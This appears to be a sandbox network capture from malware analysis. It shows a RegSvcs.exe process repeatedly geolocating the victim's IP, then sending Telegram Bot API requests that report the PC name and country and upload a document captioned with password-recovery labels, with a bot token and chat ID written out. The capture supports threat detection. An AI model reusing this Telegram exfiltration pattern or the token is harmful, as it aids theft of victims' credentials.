Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N4OY0DfEZEW4%2FH4GqQUQZj1amrZWQyiXnKz8ifLqeodQWH8aIpl0uVGjFnRejNcdvDx%2FFSVnaav5xyU8jCYkR%2B934CYnujbYZnFU8Ibv0U%2FZrvCmRM381bZQF4ilSo89SFHJ1Kl%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fff1f8fae1a424b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1534&min_rtt=1523&rtt_var=594&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1806930&cwnd=248&unsent_bytes=0&cid=43ce87b78edf7b36&ts=187&x=0"
2025-01-10 19:37:43 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49712 | 104.21.112.1 | 443 | 1340 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 19:37:44 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 19:37:44 UTC | 861 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 19:37:44 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1852653
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4baSytH6hFMszWZracXkeGp8JqTmvnQXecOOrLeOE%2Bpp8Gd%2BUqEjamN3tPW0x%2B31IEb2s3%2FlKcYkGGhfvdcbl2qIaro%2FFlcpby6i2H76wsytuzu%2Bz6ie2jdQm44dsrLH5tG1YNxH"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fff1f952fe8727b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1924&min_rtt=1915&rtt_var=736&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1468812&cwnd=234&unsent_bytes=0&cid=4910212d9ad0f2f0&ts=176&x=0"
2025-01-10 19:37:44 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49715 | 104.21.112.1 | 443 | 1340 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 19:37:45 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 19:37:45 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 19:37:45 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1852654
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bsPsQqH1v87aYTPN9STNdruCi%2Fb6YXT0YPRdyCJHJC8Gi0gNmz%2F5BgYwKn%2B5H9lyKI6MatATdw6lPKhOQG4FeOX2DhC4s4aqIU7ifY9QrEvj5CZvXZXu%2BqtRSD3I2DL6G3mOBdnk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fff1f9d8ce6729f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1929&min_rtt=1919&rtt_var=739&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1460730&cwnd=169&unsent_bytes=0&cid=249350ccf40baf35&ts=175&x=0"
2025-01-10 19:37:45 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49727 | 104.21.112.14 | 443 | 1340 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 19:37:47 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
2025-01-10 19:37:47 UTC | 853 | IN | HTTP/1.1 200 OK
  Date: Fri, 10 Jan 2025 19:37:47 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Age: 1852656
  Cache-Control: max-age=31536000
  cf-cache-status: HIT
  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=asFE3ojw9pH3sl3pketzC914pbzUwlDS4s5%2BgRCQKxqzKfPtyTu9Gy6MCW2z10Gjjn6PrMpQC0yATsBjbMyHq3UNrC3WCI%2BUyDRS9FWDu8qnzAD5hTvVNs6RUyvXKm78HAjimKXH"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8fff1fa6aa41729f-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1953&min_rtt=1948&rtt_var=741&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1465863&cwnd=169&unsent_bytes=0&cid=d14f370d4b3cb33e&ts=139&x=0"
2025-01-10 19:37:47 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49739 | 104.21.112.14 | 443 | 1340 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 19:37:48 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
2025-01-10 19:37:48 UTC | 857 | IN | HTTP/1.1 200 OK
  Date: Fri, 10 Jan 2025 19:37:48 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Age: 1852657
  Cache-Control: max-age=31536000
  cf-cache-status: HIT
  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rZ%2FnzB0oo3UzRJBIq0CBZcqqJrNrGGWPAF6wOkwPLtZsxvF64rLBD7JESl3TLishtezRMOd7JCFYSR5yNb3GC%2FuGgkwkgxGUDw3vRSDEEmKbivpd6%2BnD2uJx3UTZfFzcLlp%2Bl3k0"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8fff1faeffcf0f5b-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1663&rtt_var=933&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1006549&cwnd=221&unsent_bytes=0&cid=0c9d00e8cd929c12&ts=177&x=0"
2025-01-10 19:37:48 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49750 | 104.21.112.14 | 443 | 1340 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 19:37:49 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
2025-01-10 19:37:50 UTC | 857 | IN | HTTP/1.1 200 OK
  Date: Fri, 10 Jan 2025 19:37:50 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Age: 1852659
  Cache-Control: max-age=31536000
  cf-cache-status: HIT
  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UroWN5KyTXMlw0PInQQKsk6JoxK%2BR6rQaGhlg3c7y9BtNRqEMx%2FvsU4WJYkPq2oFQwINU2nSheEUfXADIQzySNcv2%2FpCUKCluOQk%2BEjPBKTnRwg9GcGmrEjuZQyOMixrg9XnSPQq"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8fff1fb7692c43b3-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1595&rtt_var=602&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1830721&cwnd=203&unsent_bytes=0&cid=86e21b6783a5dffa&ts=163&x=0"
2025-01-10 19:37:50 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49758 | 104.21.112.14 | 443 | 1340 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 19:37:51 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
2025-01-10 19:37:51 UTC | 857 | IN | HTTP/1.1 200 OK
  Date: Fri, 10 Jan 2025 19:37:51 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Age: 1852660
  Cache-Control: max-age=31536000
  cf-cache-status: HIT
  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2FLV%2FQua6OWmDMTkAHEQ91IMKy3nvWls7p4SXawNJk93NCliATJ1iESyKY2eWIzUxoru%2F2azzIlZUgqrcOwRSMJ6OZSNYh9QWd6pAj0z0V9xHf0oNq7BsmtSxibhc08BrcN9j81d"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8fff1fc04c59c34f-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1541&min_rtt=1499&rtt_var=592&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1947965&cwnd=181&unsent_bytes=0&cid=e09a67445e56ee0e&ts=140&x=0"
2025-01-10 19:37:51 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49770 | 104.21.112.14 | 443 | 1340 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 19:37:52 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
2025-01-10 19:37:52 UTC | 853 | IN | HTTP/1.1 200 OK
  Date: Fri, 10 Jan 2025 19:37:52 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Age: 1852661
  Cache-Control: max-age=31536000
  cf-cache-status: HIT
  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jk7SNrj8pRrGJVKv%2B8EpJHi7yG0YeFkLPEJ6XtiVvnHkvYoLtLlgsFwkjxrQ3g5alw7kYRIwEPHArDylT8LQg7za%2F3ndvQBgdCDDSinaeZy9Z0qimcOdM8yC2keT6FnQOtSyPTsx"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8fff1fc84d7ac34f-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1507&min_rtt=1502&rtt_var=574&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1887524&cwnd=181&unsent_bytes=0&cid=77a9d794e98507bc&ts=140&x=0"
2025-01-10 19:37:52 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49782 | 104.21.112.14 | 443 | 1340 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 19:37:53 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
2025-01-10 19:37:54 UTC | 855 | IN | HTTP/1.1 200 OK
  Date: Fri, 10 Jan 2025 19:37:54 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Age: 1852663
  Cache-Control: max-age=31536000
  cf-cache-status: HIT
  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I4u2Djz9s5wvOVd6%2B7Vnb0dCb46CZYpJYyH2dqcwLvXHisMBL1k7o91KgwA%2BnMagzo1OhUXXiHmlhuWDnygBdTuAaUax2O1vRplrbO9dfW1oaPD0Hu5bv1%2Fc2I8ElKHHZiXjDSAA"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8fff1fd07caf0f5b-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1544&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1794714&cwnd=221&unsent_bytes=0&cid=80ee5e849a4d207d&ts=150&x=0"
2025-01-10 19:37:54 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.649787149.154.167.2204431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 19:37:54 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2011/01/2025%20/%2003:42:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                  Host: api.telegram.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                   2025-01-10 19:37:54 UTC | 344 bytes | IN | HTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:54 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 55
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                   2025-01-10 19:37:54 UTC | 55 bytes | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                   10 | 192.168.2.6 | 49830 | 149.154.167.220 | 443 | 1340 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                   2025-01-10 19:38:01 UTC | 350 bytes | OUT | POST /bot7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE/sendDocument?chat_id=2146433139&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary=------------------------8dd32545f3d1fd1
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 584
